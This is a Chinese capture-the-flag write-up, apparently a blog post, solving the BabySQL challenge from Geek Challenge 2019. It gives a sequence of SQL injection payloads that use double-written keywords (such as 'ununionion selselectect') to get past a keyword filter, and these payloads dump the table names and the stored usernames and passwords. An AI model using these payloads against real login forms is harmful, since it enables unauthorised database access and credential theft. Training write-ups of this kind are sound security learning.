BUU13 [极客大挑战 2019]BabySQL 1

题目中过滤了or,需要使用万能密码的变形(将or替换成 || )

登进去没什么用,我们直接在用户名中输入or,select,union,where,from等词语全被过滤了,那还玩个锤子

网上一搜需要使用双写绕过

我们输入1' || 1=1 order by 3 #,发现or和by被过滤掉了

所以需要双写 or 和 by 输入 1' || 1=1 oorrder bbyy 3 #

登陆成功,说明有三列

1' ununionion selselectect 1,2,database() #

输入1' ununionion selselectect 1,2,group_concat(table_name) frfromom information_schema.tables whwhereere table_schema='geek' #

information里头有or,也被过滤了,所以需要双写

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='geek' aandnd table_name='b4bsql'#

1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

flag{fe9beefe-0390-4b0c-8214-57bfbaa43ae7}

和Lovely SQL1一个套路,只不过需要双写绕过

相关推荐
二月十六3 小时前
SQL Server中RANK()函数:处理并列排名与自然跳号
数据库·sqlserver·rank
ianozo3 小时前
BUU10 [极客大挑战 2019]LoveSQL1
数据库·sql·oracle
想做富婆3 小时前
oracle:子查询
数据库·oracle·子查询
想做富婆3 小时前
建表注意事项(2):表约束,主键自增,序列[oracle]
数据库·oracle·约束
阿猿收手吧!5 小时前
【Redis】Redis 经典面试题解析:深入理解 Redis 的核心概念与应用
数据库·redis·缓存
阿猿收手吧!6 小时前
【MySQL】MySQL经典面试题深度解析
数据库·c++·mysql·cpp
dongba86 小时前
MongoDB 聚合
数据库·mongodb
苹果酱05677 小时前
Redis基础篇(万丈高楼平地起):核心底层数据结构
java·vue.js·spring boot·mysql·课程设计
WHYBIGDATA8 小时前
Hive之数据定义DDL
大数据·数据库·hive·hadoop